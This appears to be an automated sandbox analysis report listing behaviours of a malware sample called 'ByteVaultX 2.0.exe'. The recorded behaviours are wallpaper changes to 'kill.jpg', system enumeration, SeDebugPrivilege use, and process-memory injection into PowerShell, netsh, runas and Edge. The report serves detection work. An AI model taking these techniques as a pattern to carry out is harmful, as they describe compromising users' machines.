Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1100 wrote to memory of 4228 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe
PID 1100 wrote to memory of 4228 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe
PID 4228 wrote to memory of 4844 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4228 wrote to memory of 4844 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4228 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\SYSTEM32\netsh.exe
PID 4228 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\SYSTEM32\netsh.exe
PID 4228 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\SYSTEM32\runas.exe
PID 4228 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\SYSTEM32\runas.exe
PID 4228 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4228 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3780 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
